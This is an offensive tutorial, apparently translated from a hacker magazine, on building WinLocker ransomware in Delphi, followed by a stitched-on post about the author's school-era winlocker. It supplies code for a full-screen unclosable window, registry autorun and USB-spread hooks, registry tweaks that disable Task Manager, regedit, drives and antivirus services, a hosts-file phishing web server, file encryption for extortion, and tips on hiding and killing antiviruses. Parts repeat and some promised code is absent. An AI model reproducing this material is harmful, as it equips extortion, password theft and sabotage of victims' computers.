We write WinLocker in delphi. Writing WinLocker in delphi Installing and removing programs

Your mother! I caught this infection again! Fuck, shit! This is roughly how each of us swears once again, having picked up a popular malware like Winlocker. Today, viruses of this type are like the plague in the Middle Ages. They are easy to grab, but difficult to treat. What can I say, even the most seasoned magicians of the “antivirus” clan are not always able to quickly repel the vile infection. But 99% of these creations were written by schoolchildren who barely learned to code. In this article I will try to clearly explain all the intricacies of developing terrible winlockers.
How does infection occur?
Let’s not immediately get into the coding jungle, but let’s figure it out with the theory. First of all, let's look at typical infection options. There are extremely many ways to become infected. The most popular are:
1. Browser bugs. It's no secret that one of the goals of a modern virus writer is the user's browser. Useful web services are a dime a dozen and users, of course, use them. The browser is for many the most frequently used program, which very rarely closes (author’s note - for me it doesn’t close at all).
There is no need to go to a fortune teller and ask the answer to the question: “Which door is best to break into the user’s system?” It’s already clear here - you need to exploit vulnerabilities in the most popular browsers. To put this method into practice, you don’t need to have special intelligence. It’s enough to browse through security sites, find the appropriate exploit and beautifully design it to suit your needs. Fast, easy and free.
2. Hello great Flash. In recent months, Adobe has been screwing up as badly as possible. Before they have time to release a new version of the flash player, hackers manage to discover a critical vulnerability in it. They find them, poke their noses at the developers, but they are in no hurry (or cannot?) to correct them. It is foolish to believe that virus writers will sit still and wait for the bug to be patched. They do not sleep and try to exploit the vulnerability for their own gain. This is how it turns out that after watching a funny video, your system begins to behave strangely.
3. User naivety. When I started preparing this article, for the sake of experiment I loaded the OS in a virtual machine and tried to browse “dubious” sites. Believe it or not, I managed to pick up Winlocker three times, agreeing to install the “latest version” of the flash player and “special” codecs. To be honest, I was a little shocked, because... I thought that such methods were no longer used, but no...
What will we code on?
I thought for a long time about what language to write the examples for this article in, and decided to recall the time-tested Delphi. “So your exe will be about a megabyte!”, you will object. Partly yours, true, but we will solve this problem at the inception stage. All code will be provided in a pure API. Accordingly, the compiled project will weigh less than 100 kilobytes And if you go through it with a byte code archiver, you will be able to lose another couple of tens of kilos.
The basis of any Winlocker
The main brick of any Winlocker is its shape, which stretches almost across the entire screen. Moreover, this is not just a large form, but a window that overlaps all the others and does not obey any commands at all. Neither minimize, resize, much less terminate the program process.
At first glance, it may seem that virus writers have invented some kind of know-how, but in reality everything is much simpler. In fact, this is the most ordinary window, for which the display style is set on top of all windows. To make the window behave like a guerrilla and not respond to user requests, the developers slightly modify the procedure for processing messages from the outside world.
The modification comes down to banal processing of the WM_SYSCOMMAND message. To be even more precise, in the procedure (see Listing 1) for processing received messages, you just need to declare a check for the WM_SYSCOMMAND message. The funny thing is that in processing this message you don’t have to write any code at all. Your form will no longer respond to events in the external environment.

Winlocker Gallery ​

Spoiler

wc. cbSize : = sizeof (wc) ; wc. style:=cs_hredraw or cs_vredraw; wc. lpfnWndProc := @WindowProc; wc. cbClsExtra := 0 ; wc. cbWndExtra := 0 ; wc. hInstance : = HInstance; wc. hIcon : = LoadIcon(0 , idi_application) ; wc. hCursor : = LoadCursor(0 , idc_arrow) ; wc. hbrBackground : = COLOR_BTNFACE+ 1 ; wc. lpszMenuName := nil; wc. lpszClassName : = "win_main" ; RegisterClassEx(wc) ; leftPos: = 20 ; topPos: = 0 ; windowWidth: = Screen. Width ; WindowHeight: = Screen. Height ; MainWnd: = CreateWindowEx( 0 , "win_main" , "test" , ws_overlappedwindow, leftPos, topPos, windowWidth, windowHeight, 0 , 0 , Hinstance, nil) ; SetWindowLong(MainWnd, GWL_HWNDPARENT, GetDesktopWindow) ; SetWindowPos(MainWnd, HWND_TOPMOST, 0 , 0 , 0 , 0 , SWP_NOMOVE or SWP_NOSIZE) ; ShowWindow(MainWnd, CmdShow) ; While GetMessage(Mesg, 0 , 0 , 0 ) do begin TranslateMessage(Mesg) ; DispatchMessage(Mesg) ; end;

Spoiler

var Key: HKey; begin //You can substitute one of the autoload paths here. RegOpenKey(HKEY_LOCAL_MACHINE, PChar("path in the registry"), Key); RegSetValueEx(Key, PChar(paramstr(0)), 0, REG_SZ, pchar(paramstr (0 ) ) , lstrlen( pchar(paramstr (0) ) + 1); RegCloseKey(Key) ; end;

Great ProcessMonitor ​

Group Policy Editor ​

Blocking result ​

In msdn you can find the answer to any question ​

Spoiler

var disk: DWORD; begin case Msg. WParam of DBT_DEVICEARRIVAL: //If you connected a flash drive if then begin //Trying to determine the drive letter disk : = PDEV_BROADCAST_VOLUME(Msg. LParam ) ^ . dbcv_unitmask ; //Execute our malicious code end; DBT_DEVICEREMOVECOMPLETE: //If the flash drive is removed if(PDEV_BROADCAST_HDR(Msg. LParam ) ^ . dbch_devicetype = DBT_DEVTYP_VOLUME) then begin //Flash drive has been mounted end;

Spoiler

var _buff: array [ 0 .. 1024] of char; _request: string; _temp: string; _path: string; _FileStream : TFileStream; begin Recv(_client, _buff, 1024 , 0 ) ; _request: = string(_buff) ; _path : = GetFilePath ( Copy ( _request , 1 , pos ( #13 , _request ) ) ) ; _path : = ReplaceSlash(_path) ; if((_path = "" ) or(_path = "\" ) ) Then _path := DocumentRoot + "\" + DirectoryIndex; ( else if ((_path ="\")) Then _path:= DocumentRoot + "\" + DirectoryIndex; ) if(FileExists(_Path)) Then begin _FileStream: = TFileStream. Create (_Path, fmOpenRead) ; SendStr(_Client, "HTTP/1.0 200 OK" ) ; SendStr(_Client, "Server: xSrV" ) ; SendStr(_Client, "Content-Length:" + IntToStr (_FileStream. Size ) ) ; SendStr(_Client, "Content-Type: " + GetTypeContent(_Path) ) ; SendStr(_Client, "Connection: close" ) ; SendStr(_Client, "" ) ; SendFile(_Client, _FileStream) ; _FileStream. Free ; End

It is no secret that many users are so far from information technology that allowing them to work with such a complex device as a computer is fraught. But how to restrict access to a PC? After all, today anyone with at least 10% of their arms growing out of their shoulders can turn on a computer. Fortunately, there is a whole class of programs that help limit user access to various components of the operating system: from a simple ban on playing Solitaire or Minesweeper, to completely blocking Windows.

How does infection occur?

However, not all users agree to voluntarily block their system (I want to focus your attention on the fact that in this article we will not consider the creation of malware). So, often such software is delivered to their machines in the form of a virus. There are extremely many ways to infect a victim. Among them, the most popular are:

1. BROWSER BUGS. It's no secret that one of the goals of a modern virus writer is the user's browser. Useful web services are a dime a dozen, and users, of course, use them. For many, the browser is the most frequently used program, which very rarely closes (it doesn’t close at all for me).

There is no need to go to a fortune teller in search of an answer to the question “through which door is best to break into the user’s system?” Here it is already clear: it is necessary to exploit the vulnerabilities of the most popular browsers. To apply this method, you do not need to have special intelligence. It’s enough to browse security sites, find (if there is one) a suitable layer and design it beautifully for your needs. Fast, easy and free.

2. FLASH. Adobe has been regularly screwing up in recent months. Before they have time to release a new version of the flash player, hackers manage to discover a critical vulnerability in it. They find them, poke the developers’ noses, but they are in no hurry to correct them.
It is foolish to believe that at the same time the virusmakers will quietly sit on their fifth point and wait for the bug to be patched. They are constantly trying to take advantage of a fresh vulnerability and squeeze the maximum benefit out of it. As a result, it turns out that after you watch a funny video, the system begins to behave strangely.

3. USER NAIVET. When I started preparing this article, for the sake of experiment, I loaded the OS in a virtual machine and tried to browse “dubious” sites. Believe it or not, I managed to pick up Winlocker three times, agreeing to install the “latest version” of the flash player and “special” codecs. To be honest, I was a little shocked, because I thought that such methods no longer worked.

What will we code on?

I thought for a long time about what language to write the examples for this article in, and decided to remember the time-tested Delphi. “So your exe will be about a megabyte!”, you object. You are partly true, but we will solve this problem at the conception stage of the project. All code will be provided in pure API. Accordingly, our animal in compiled form will weigh less than 100 KB. We will lose another couple of tens of kilos by manipulating the bytecode archiver on the resulting binary.

The basis of any Winlocker

The foundation of any Winlocker is a form stretched almost across the entire screen. Moreover, this is not just a large form, but a window that overlaps all the others and does not obey any commands at all. Neither minimize, nor resize, much less terminate the program process. At first glance, it may seem that virus writers have invented know-how, but in reality everything is much simpler. In fact, this is the most ordinary window, for which the display style is set to “on top of all”. To make the window behave like a guerrilla and not respond to user requests, the developers slightly modify the procedure for processing messages from outside.

The modification comes down to banal processing of the WM_SYSCOMMAND message. To be even more precise, in the procedure for processing received messages you only need to declare a check for the WM_SYSCOMMAND message. The funny thing is that in processing this message you don’t have to write any code at all - the form will already stop responding to events in the external environment.

Autostart

The virus must be loaded along with the operating system. There are several ways to ensure your program autoloads. Conventionally, they can be divided into two groups: simple and advanced. There is not enough space in the article to consider the advanced ones, so we will consider only simple ones based on the use of the registry. So, there are several autostart corners in the registry:

1. HKLM\Software\Microsoft\Windows\CurrentVersion\Run - programs that are launched when any user logs in start from here.
2. HKCU\Software\Microsoft\Windows\Current\Version\Run - a location similar to the previous one, except that the current user’s programs are loaded from here.
3. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - list of programs that are launched before users log in.
4. HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run - this registry section is responsible for starting programs added to startup through group policies.
5. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows is another location that contains a list of programs that come with Windows.
6. KHLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon - this branch contains a link to the Winlogon, but nothing prevents you from specifying the path to your program.
7. Startup folder. Perhaps the most primitive method, but nevertheless, many virus writers use it.

Which of the suggested startup locations should you choose for your creation? There is no exact answer, but it is highly not recommended to bet everything on any one of the proposed options. It is much better to use a combination, that is, register in several places at once. An example of writing to autoload on WinAPI is given in the second box.

We will block you and we will block me!

For example, you can easily designate a program that will launch after the system boots or block the start of a specific application. Almost all operations that are performed through this snap-in modify certain registry keys. If you manage to find out which registry keys are being modified, you can easily change them directly from your program. How to do it? There are two options: apply the scientific poke method, or use the ProcessMonitor utility from Mark Russinovich. The second method is clearly cooler, so we advise you to download the utility and start researching.

Registry Editor

Most users are accustomed to editing the registry using the built-in Windows registry editor, regedit. Since our virus will make changes to the registry, we need to prevent a careless user from tampering with the registry. There’s no point in him sticking his curious nose where it shouldn’t. The easiest way to solve this problem is to block the launch of the Registry Editor. To block, just create the DisableRegistryTools key with the value 1 in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System branch.

Task Manager

Without exception, all the winlockers that I saw blocked the launch of the task manager. Well, let's not lag behind them. This feature is implemented by creating the DisableTaskMgr key (dword type) with the value 1 in the same branch as DisableRegistryTools.

Installation and removal of programms

Particularly smart users use the “Add or Remove Programs” applet to try to install antiviruses in the event of a system infection. This can be easily stopped by creating the NoAddRemovePrograms key with a value of 1 (dword type) all in the same section as DisableRegistryTools.

Blocking access to disks

To completely ruin the user’s mood, you can completely block access to the disks present in the system. Let the user not even try to run the antivirus from his flash drive! Let's implement this trick by creating a NoViewOnDrive (dword) key in the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer section. As the value for the key, we specify the bitmask of the disk to be blocked. For example, for drive C it will be 4. If you need to block several drives, their masks will have to be added together. For example, a value of 12 would correspond to drives C (4) and D (8) being locked.

Tip #1: It’s more fun together anywhere

Infected a poor user's computer? Don't forget to take care of his friends! Remember, the wider the virus spreads, the greater the chances of getting money. Having settled on an enemy vehicle, you should not waste time, but try to find a new bridgehead. How to do it? One of the simplest and most effective ways is to monitor and infect flash drives. Since users constantly use flash drives, it will be easy for our virus to migrate from one system to another. It is easy to determine whether a flash drive is connected. It is enough to write code that processes the WM_DEVICECHANGE event.

In the code in the third box, I used constants and structures that are not described in the modules that come with Delphi. You will have to describe them yourself. I took all the information from MSDN, but you don’t have to worry about it and just get the source of my code on DVD.

Tip #2: your passes will be ours!

What web services does a modern user use? You don’t need to be a rocket scientist to name at least a few of them: mail, Odnoklassniki, VKontakte, facebook, twitter, etc. The list goes on and on. What am I getting at? And besides, being on enemy territory, it would be nice to collect all the passwords. Perhaps they will come in handy in the future. In addition, having such trump cards in hand, it becomes possible to stimulate the victim. For example, having received passwords from various accounts, the author of the virus can use them to change contact information and change passwords to his own. As a result, the real user will end up in a very bad situation. Simply put, he loses his account. This is already much more serious than a blocked desktop, and if so, then the chances of payment for your “services” increase.

The question immediately arises, what is the easiest way to do this? Typically, users store their passwords directly in the browser, so the idea immediately arises of stealing the password storage file. An example of such theft was demonstrated in the article “Evil Computer”. I'll show you an alternative method. The idea is to simply modify the hosts. This file contains matches of the “symbolic site address:ip” type. Our program should be able to modify this file and add correspondence for popular web services. “Where are we going to transfer the user?” To do this, you can concoct your own evil website, on which scams from popular services will be located. This method is easy to implement, but if users are massively infected, such sites probably won’t last long. In this regard, we will abandon the proposed method, and will go in a not entirely standard way - we will build a small web server into the virus. In this situation, our redirection destination will be localhost.

For example: 127.0.0.1 www.odnoclassniki.ru

We won’t consider editing the hosts file; it’s better to immediately take a look at how to set up your WEB server using Delphi. If you are a regular reader of our magazine, you should be well versed in the Winsock API. At one time, in the Coding section there were articles about writing all kinds of clients (FTP, PROXY, IRC, etc.) using only an api function. I recommend that you pick up the binder and thoroughly familiarize yourself with the topic of the subject (oil - editor's note).

Now, instead of Odnoklassniki.ru, the victim will not end up on the real site of a popular social network, but directly in the clutches of our evil server. Of course, the web server must be polite and display the real page of classmates (read - a scam site, it must be prepared in advance). Well, then everything is simple: the user enters his login information, after which our web server saves it. In order not to be openly scorched, it is advisable to redirect to a page with a warning that the site is currently closed for maintenance work. Or, as an option, save and forward the entered data to real classmates.

Trick #3: ecstasy for the user

How do evil programmers encourage users to part with hard-earned paid SMS? Differently. For example, encrypting files that are valuable to him. What files should I pay attention to? It is best to use those on which the victim’s work/study may depend, for example: documents (doc, xls, mdb, ppt, txt), images (jpeg, png, bmp), source texts (php, pas, c, h, cpp , dpr, py, etc.). If the victim was writing a thesis or some extremely important report that is due tomorrow, then the attacker has every chance of receiving a monetary reward.

Now let's talk about the technical implementation of this thing. Finding files is done with the FindFirs() and FindNext() functions from the Sysutils module. It’s easy to work with them, but the simplicity of such fast food will negatively affect the figure of our application. Since we don’t need to gain excess weight, we will use more dietary products: FindFirstFile() and FindNextFile(). Working with them is a little more difficult (see example of searching for files on disk), but beauty requires sacrifice.

Encrypting files using Delphi is also quite simple. It all depends on the chosen encryption method. You can simply use ready-made modules, which are a dime a dozen on torry.net and other sites. For example, I came across a good option from one of the Delphi developers. This module implements the following functions:

//File encryption
function FileEncrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//File decryption
function FileDecrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//Text encryption
function TextEncrypt(const s: string;
Key: TWordTriple): string;
//Text decryption
function TextDecrypt(const s: string;
Key: TWordTriple): string;
//Encryption of "memory"
function MemoryEncrypt(Src: Pointer; SrcSize:
Cardinal;
Target: Pointer; TargetSize: Cardinal;
Key: TWordTriple): boolean;
//Decryption of “memory”
function MemoryDecrypt(Src: Pointer;
SrcSize: Cardinal; Target: Pointer;
TargetSize: Cardinal; Key: TWordTriple): boolean;

The full text of these functions, as well as examples of their use, can be found on our disk.

Tip #4: multiply!

Tip #5: Play hide and seek to the maximum

As practice has shown, the authors of Winlockers do not care much about the safety of their creations. The protection of most representatives of this group of viruses that came across my eyes came down to the banal assignment of an inconspicuous file name. For example: system.exe, user32.exe, csrss.exe, eplorer.exe and so on. I didn’t think that such methods were still in use, but as it turned out, I was mistaken.
I recommend that you do not neglect security, but consider several different algorithms:

1. Give the virus file an inconspicuous name. Although this is a primitive rule, it is highly advisable to follow it.
2. Remove the virus from the list of processes. This can be achieved by understanding API function interception. We have already written many times about API interception. Be sure to re-read these articles!
3. Use several autoload methods.

Trick #6: kill at the start

Don't be lazy and write a procedure for forcing processes to terminate. It will definitely help you protect your brainchild from evil antiviruses that the user will try to run. The ideal is to generally intercept functions used to launch programs and prevent them from working normally.

Work complete

Writing WinLocker and making a few hundred bucks on it is more than possible. Users still do not think about security and, if a sensitive situation arises, they are ready to send the treasured SMS rather than strain their brains. I showed you the most primitive skeleton of Winlocker. In principle, bringing it to combat condition is a matter of several hours. But is it necessary to do this? The choice is yours! The main thing is not to forget that writing and distributing viruses is a criminal offense for which you can get a real prison sentence. Of course, I won’t give you the source code for the full virus. No, not because I'm greedy. These viruses are already annoying everyone, so I sure as hell don’t want there to be even more of them after this article. In addition, I don’t want to read news about how law enforcement agencies detained the latest creators of terrible viruses :).

Homemade web server

var
_buff: array of char;
_request:string;
_temp: string;
_path: string;
_FileStream: TFileStream;
begin
Recv(_client, _buff, 1024, 0);
_request:=string(_buff);
_path:= GetFilePath(Copy
(_request, 1, pos(#13, _request)));
_path:= ReplaceSlash(_path);
if ((_path = "") or (_path = "\")) Then
_path:= DocumentRoot + "\" + DirectoryIndex;
( else
if ((_path = "\")) Then
_path:= DocumentRoot + "\" +
DirectoryIndex; )
if (FileExists(_Path)) Then
begin
_FileStream:=
TFileStream.Create(_Path, fmOpenRead);
SendStr(_Client, "HTTP/1.0 200 OK");
SendStr(_Client, "Server: xSrV");
SendStr(_Client, "Content-Length:" +
IntToStr(_FileStream.Size));
SendStr(_Client, "Content-Type: "
+ GetTypeContent(_Path));
SendStr(_Client, "Connection: close");
SendStr(_Client, "");
SendFile(_Client, _FileStream);
_FileStream.Free;
End
//Cut out

Limiting the launch of applications

Using the registry, it is possible to determine the list of programs approved for launch. If this list is specified, the user will not be able to launch applications that are not in it. The list of applications approved for launch is set here: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\ RistrictRun. Having created keys in this section (type REG_SZ) for each allowed program, you will need to go up one level and add the RestrictRun parameter of type dword with a value of 1.

Computer management

A user can do a lot of bad things if he has access to launch the Computer Management snap-in. It is impossible to completely disable the snap-in using the registry, but removing the link to launch it from the context menu of the “My Computer” shortcut is a piece of cake. All you need to do is create a NoManageMyComputerVerb parameter of type dword with a value of 1 in the HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer section.

We cut down services

Using the capabilities of the registry, you can easily disable services that the user does not need (for example, antiviruses). The complete list of services installed on the system is located in the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services branch. To deactivate the service, edit the value of the start key. For example, to set the “Startup type” service to “manual”, the start key must be set to 3. If you want your software to last longer in an enemy system, then I advise you to maintain a database of antivirus services in your creation. That is, you need to clearly identify antivirus services and change their startup type.

What else do we need?

We have looked at the typical functions of any Winlocker, now it’s time to think about how to improve our brainchild. To be honest, I don’t understand why professional virus writers don’t build additional useful functions into such viruses. After all, there is no guarantee that the user will reach for his mobile phone and send the treasured SMS to a short number, thereby enriching the author of the virus. But there is always a chance to steal useful information from the user’s car: passwords for various services, documents, recorded Skype conversations, etc. We will not introduce any restrictions, but will upgrade our software in full. So, below I have described six features that would be useful to implement in such a “project”.

Monitoring flash drives

var
disk:DWORD;
begin
case Msg.WParam of
DBT_DEVICEARRIVAL: //If you connected a flash drive


begin
//Trying to determine the drive letter
disk:= PDEV_BROADAST_VOLUME(Msg.LParam" ")^
.dbcv_unitmask;
//Execute our malicious code
end;
DBT_DEVICEREMOVECOMPLETE: //If the flash drive is removed
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//Flash drive has been mounted
end;

Unclosed window on WINDOWS API

wc.cbSize:=sizeof(wc);
wc.style:=cs_hredraw or cs_vredraw;
wc.lpfnWndProc:=@WindowProc;
wc.cbClsExtra:=0;
wc.cbWndExtra:=0;
wc.hInstance:=HInstance;
wc.hIcon:=LoadIcon(0,idi_application);
wc.hCursor:=LoadCursor(0,idc_arrow);
wc.hbrBackground:=COLOR_BTNFACE+1;
wc.lpszMenuName:=nil;
wc.lpszClassName:=’win_main’;
RegisterClassEx(wc);
leftPos:=20;
topPos:=0;
windowWidth:=Screen.Width;
WindowHeight:=Screen.Height;
MainWnd:=CreateWindowEx(
0,
'win_main',
'test',
ws_overlappedwindow,
leftPos,
topPos,
windowWidth,
windowHeight,
0,
0,
Hinstance,
nil
);
SetWindowLong(MainWnd, GWL_HWNDPARENT,
GetDesktopWindow);
SetWindowPos(MainWnd, HWND_TOPMOST,
0, 0, 0, 0, SWP_NOMOVE or SWP_NOSIZE);
ShowWindow(MainWnd, CmdShow);
While GetMessage(Mesg,0,0,0) do
begin
TranslateMessage(Mesg);
DispatchMessage(Mesg);
end;

WINAPI for working with the registry

var
Key: HKey;
begin
//You can substitute one of the paths here
startup.
RegOpenKey(HKEY_LOCAL_MACHINE,
PChar(''), Key);
RegSetValueEx(Key,PChar(paramstr(0)),
0, REG_SZ,
pchar(paramstr(0)),
lstrlen(pchar(paramstr(0)))+1);
RegCloseKey(Key);
end;

Review of my trojan.winlock virus, which was written during my school years

In this article I would like to tell you about my computer virus, which I wrote when I was in 9th grade.

The case began around the beginning of December 2012. I was in a wonderful New Year's mood. There were blizzards and snow falling outside. Back then, it was very popular among schoolchildren to throw viruses at each other under the guise of interesting programs. The trojan.winlocker virus was especially popular, which completely blocked the computer until the password was entered.

It was Friday, the end of the school week, and the new year was soon, so the mood was just great. On this day, my classmate boasted to everyone that yesterday he had a very interesting story, which he filmed on video.

He saw a topic on one of the forums where they discuss cheating in online games, where someone asked to download a working cheat for the online game War Face. My friend answered, they say, write to me on Skype, I’ll send you a cheat and tell you how to use it for free. A conversation began on Skype, but instead of a cheat for an online game, my friend sent him a Winlocker, which he downloaded from the Internet and began to blackmail him. In exchange for the password, he forced him to do whatever he said and filmed it all. He never gave him the password.

However, I saw many shortcomings in the winlocker that my friend used. Firstly, it is “scorched” by antiviruses and does not work in safe mode. I decided to write my own winlocker, which will be devoid of these shortcomings.

But despite the popularity of this virus, at that time there were very few articles on the topic of its creation, and therefore its creation took two weeks, or even a little longer.

When the creation and testing work was completed, I was very pleased with the result. Antiviruses did not bother it, and even when particularly experienced users tried to remove it through safe mode, they were disappointed.

I can’t describe exactly what problems I encountered during development, because I don’t remember, but recently I found a flash drive under a closet, in which I found a .rar archive with the source code. I wrote the virus itself in C# and forgot to say that it fully works on Windows 8.

The purpose of this article was to tell what I did during my school years and share my creativity. Now I haven’t done such things for a long time. Currently I am developing software for iOS and Android.

Now I will give some of the most interesting lines of code.

Block task manager.

This code makes sure that when the system boots, the virus file is launched instead of explorer.exe.

Close the explorer.exe process.

Checking for administrator rights (they are required for the virus to work).

Locking and unlocking the system.

This is what the Winlocker form looks like.

Well, here is the event that occurs when you press the unlock button.